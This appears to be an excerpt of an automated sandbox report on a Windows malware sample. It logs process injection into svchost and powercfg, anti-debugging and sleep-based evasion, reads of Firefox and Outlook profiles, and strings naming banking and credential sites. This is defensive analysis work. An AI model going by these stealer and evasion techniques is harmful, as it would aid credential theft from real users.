                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006C83BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_006C83BB
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_00654E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00654E89
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeFile created: C:\Users\user\AppData\Local\Temp\aut2D31.tmpJump to behavior
                Source: wWXR5js3k2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: powercfg.exe, 00000005.00000003.2075520065.0000000002EB5000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000005.00000003.2075386075.0000000002E94000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2611913316.0000000002EB5000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2611913316.0000000002EC0000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2611913316.0000000002EE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: wWXR5js3k2.exeVirustotal: Detection: 64%
                Source: wWXR5js3k2.exeReversingLabs: Detection: 73%
                Source: unknownProcess created: C:\Users\user\Desktop\wWXR5js3k2.exe "C:\Users\user\Desktop\wWXR5js3k2.exe"
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\wWXR5js3k2.exe"
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeProcess created: C:\Windows\SysWOW64\powercfg.exe "C:\Windows\SysWOW64\powercfg.exe"
                Source: C:\Windows\SysWOW64\powercfg.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\wWXR5js3k2.exe"Jump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeProcess created: C:\Windows\SysWOW64\powercfg.exe "C:\Windows\SysWOW64\powercfg.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\powercfg.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: C:\Windows\SysWOW64\powercfg.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: wWXR5js3k2.exe | Static file information: File size 1326080 > 1048576
Source: wWXR5js3k2.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: wWXR5js3k2.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: wWXR5js3k2.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: wWXR5js3k2.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: wWXR5js3k2.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: wWXR5js3k2.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Binary string: powercfg.pdbGCTL source: svchost.exe, 00000002.00000003.1852599121.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1852713638.0000000002A2D000.00000004.00000020.00020000.00000000.sdmp, ycBMGRFRlht.exe, 00000004.00000002.2612973441.0000000000F68000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ycBMGRFRlht.exe, 00000004.00000000.1809965971.000000000041E000.00000002.00000001.01000000.00000005.sdmp, ycBMGRFRlht.exe, 00000008.00000000.1957819340.000000000041E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: wWXR5js3k2.exe, 00000000.00000003.1371523327.00000000036F0000.00000004.00001000.00020000.00000000.sdmp, wWXR5js3k2.exe, 00000000.00000003.1370169862.0000000003890000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793017531.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1886544115.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1886544115.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795048850.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000005.00000003.1888818959.0000000003100000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2613793846.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2613793846.000000000344E000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000005.00000003.1886495587.0000000002F2E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: wWXR5js3k2.exe, 00000000.00000003.1371523327.00000000036F0000.00000004.00001000.00020000.00000000.sdmp, wWXR5js3k2.exe, 00000000.00000003.1370169862.0000000003890000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1793017531.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1886544115.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1886544115.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795048850.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, powercfg.exe, 00000005.00000003.1888818959.0000000003100000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2613793846.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2613793846.000000000344E000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000005.00000003.1886495587.0000000002F2E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: powercfg.exe, 00000005.00000002.2611913316.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2614313409.00000000038DC000.00000004.10000000.00040000.00000000.sdmp, ycBMGRFRlht.exe, 00000008.00000000.1958596191.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2185627863.000000003B45C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: powercfg.exe, 00000005.00000002.2611913316.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2614313409.00000000038DC000.00000004.10000000.00040000.00000000.sdmp, ycBMGRFRlht.exe, 00000008.00000000.1958596191.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2185627863.000000003B45C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: powercfg.pdb source: svchost.exe, 00000002.00000003.1852599121.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1852713638.0000000002A2D000.00000004.00000020.00020000.00000000.sdmp, ycBMGRFRlht.exe, 00000004.00000002.2612973441.0000000000F68000.00000004.00000020.00020000.00000000.sdmp
Source: wWXR5js3k2.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: wWXR5js3k2.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: wWXR5js3k2.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: wWXR5js3k2.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: wWXR5js3k2.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Code function: 0_2_00654B37 LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Code function: 0_2_0065C4C6 push A30065BAh; retn 0065h 0_2_0065C50D
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Code function: 0_2_00678945 push ecx; ret 0_2_00678958
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02614A5F push edx; retf 2_2_02614A60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0262D863 push edi; iretd 2_2_0262D86C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_026051C0 pushad ; ret 2_2_026051CB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02618712 push ebp; iretd 2_2_0261871A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02624CB3 push edi; ret 2_2_02624CD5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_026164BD push ecx; ret 2_2_026164DD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0260D48E push cs; ret 2_2_0260D4BB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02603570 push eax; ret 2_2_02603572
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02614D03 push ss; ret 2_2_02614D04
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030309AD push ecx; mov dword ptr [esp], ecx 2_2_030309B6
Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe | Code function: 4_2_02D6524B push ecx; ret 4_2_02D6526B
Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe | Code function: 4_2_02D5C21C push cs; ret 4_2_02D5C249
Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe | Code function: 4_2_02D610D6 push ebx; retf 4_2_02D610DB
Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe | Code function: 4_2_02D6808E push ss; retf 4_2_02D6808F
Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe | Code function: 4_2_02D53F4E pushad ; ret 4_2_02D53F59
Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe | Code function: 4_2_02D674A0 push ebp; iretd 4_2_02D674A8
Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe | Code function: 4_2_02D69C43 push cs; iretd 4_2_02D69C4A
Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_032B225F pushad ; ret 5_2_032B27F9
Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_032B27FA pushad ; ret 5_2_032B27F9
Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_032E09AD push ecx; mov dword ptr [esp], ecx 5_2_032E09B6
Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_032B283D push eax; iretd 5_2_032B2858
Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_02A8A2F0 push edi; iretd 5_2_02A8A2F9
Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_02A7C732 push esp; iretd 5_2_02A7C733
Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_02A7519F push ebp; iretd 5_2_02A751A7
Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_02A81740 push edi; ret 5_2_02A81762
Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_02A77942 push cs; iretd 5_2_02A77949
Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_02A61C4D pushad ; ret 5_2_02A61C58
Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_031063B5 push esp; retf 5_2_0310643F
Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_0310622C push cs; retf 5_2_03106243
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Code function: 0_2_006548D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Code function: 0_2_006D5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Code function: 0_2_00673187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress (x36)
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\powercfg.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\wWXR5js3k2.exe | API/Special instruction interceptor: Address: 32D31F4
Source: C:\Windows\SysWOW64\powercfg.exe | API/Special instruction interceptor: Address: 7FF90818D324
Source: C:\Windows\SysWOW64\powercfg.exe | API/Special instruction interceptor: Address: 7FF90818D7E4
Source: C:\Windows\SysWOW64\powercfg.exe | API/Special instruction interceptor: Address: 7FF90818D944
Source: C:\Windows\SysWOW64\powercfg.exe | API/Special instruction interceptor: Address: 7FF90818D504
Source: C:\Windows\SysWOW64\powercfg.exe | API/Special instruction interceptor: Address: 7FF90818D544
Source: C:\Windows\SysWOW64\powercfg.exe | API/Special instruction interceptor: Address: 7FF90818D1E4
Source: C:\Windows\SysWOW64\powercfg.exe | API/Special instruction interceptor: Address: 7FF908190154
Source: C:\Windows\SysWOW64\powercfg.exe | API/Special instruction interceptor: Address: 7FF90818DA44
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0307096E rdtsc
Source: C:\Windows\SysWOW64\powercfg.exe | Window / User API: threadDelayed 4304
Source: C:\Windows\SysWOW64\powercfg.exe | Window / User API: threadDelayed 5670
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-102343
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | API coverage: 4.9 %
Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
Source: C:\Windows\SysWOW64\powercfg.exe | API coverage: 2.6 %
Source: C:\Windows\SysWOW64\powercfg.exe TID: 7736 | Thread sleep count: 4304 > 30
Source: C:\Windows\SysWOW64\powercfg.exe TID: 7736 | Thread sleep time: -8608000s >= -30000s
Source: C:\Windows\SysWOW64\powercfg.exe TID: 7736 | Thread sleep count: 5670 > 30
Source: C:\Windows\SysWOW64\powercfg.exe TID: 7736 | Thread sleep time: -11340000s >= -30000s
Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe TID: 7752 | Thread sleep time: -35000s >= -30000s
Source: C:\Windows\SysWOW64\powercfg.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Code function: 0_2_006B445A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Code function: 0_2_006BC6D1 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Code function: 0_2_006BC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Code function: 0_2_006BEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Code function: 0_2_006BF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Code function: 0_2_006BF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Code function: 0_2_006B37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Code function: 0_2_006B3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Code function: 0_2_006BBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\powercfg.exe | Code function: 5_2_02A7C9B0 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Code function: 0_2_006549A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: 320lF200.5.dr | Binary or memory string: dev.azure.comVMware20,11696497155j
Source: 320lF200.5.dr | Binary or memory string: global block list test formVMware20,11696497155
Source: 320lF200.5.dr | Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: 320lF200.5.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: 320lF200.5.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: 320lF200.5.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
Source: 320lF200.5.dr | Binary or memory string: tasks.office.comVMware20,11696497155o
Source: 320lF200.5.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: 320lF200.5.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: powercfg.exe, 00000005.00000002.2611913316.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, ycBMGRFRlht.exe, 00000008.00000002.2612867629.000000000132F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 320lF200.5.dr | Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: 320lF200.5.dr | Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: 320lF200.5.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: 320lF200.5.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: 320lF200.5.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: 320lF200.5.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: 320lF200.5.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: 320lF200.5.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: 320lF200.5.dr | Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: 320lF200.5.dr | Binary or memory string: AMC password management pageVMware20,11696497155
Source: 320lF200.5.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: 320lF200.5.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: 320lF200.5.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: 320lF200.5.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: 320lF200.5.dr | Binary or memory string: discord.comVMware20,11696497155f
Source: 320lF200.5.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: 320lF200.5.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: 320lF200.5.dr | Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: 320lF200.5.dr | Binary or memory string: outlook.office.comVMware20,11696497155s
Source: 320lF200.5.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: 320lF200.5.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: 320lF200.5.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
Source: firefox.exe, 0000000A.00000002.2187174777.0000023F7B49D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllpp
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | API call chain: ExitProcess graph end node graph_0-101117
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | API call chain: ExitProcess graph end node graph_0-101189
Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\powercfg.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02617ED3 LdrLoadDll
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Code function: 0_2_006C3F09 BlockInput
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Code function: 0_2_00653B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Code function: 0_2_00685A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Code function: 0_2_032D3460 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Code function: 0_2_032D34C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Code function: 0_2_032D1E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0302C310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03050310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B035C mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FA352 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D437C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030EC3CD mov eax, dword ptr fs:[00000030h]
